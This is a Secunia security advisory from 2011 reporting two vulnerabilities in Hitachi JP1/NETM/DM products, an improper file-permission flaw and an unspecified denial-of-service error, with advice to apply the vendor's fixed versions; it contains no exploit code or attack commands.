http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi JP1/NETM/DM Products Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43140
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43140/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43140
RELEASE DATE:
2011-02-01
DISCUSS ADVISORY:
http://secunia.com/advisories/43140/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43140/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43140
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in various Hitachi products,
which can be exploited by malicious, local users to potentially gain
knowledge of sensitive information and malicious people to cause a
DoS (Denial of Service).
1) The permissions for certain files are not properly set, which
allows local users to access files that they are not intended to
access.
2) An unspecified error can be exploited to cause a DoS.
SOLUTION:
Update to fixed versions (please see the vendor's advisory for
details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
HS11-001 (Japanese):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-001/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------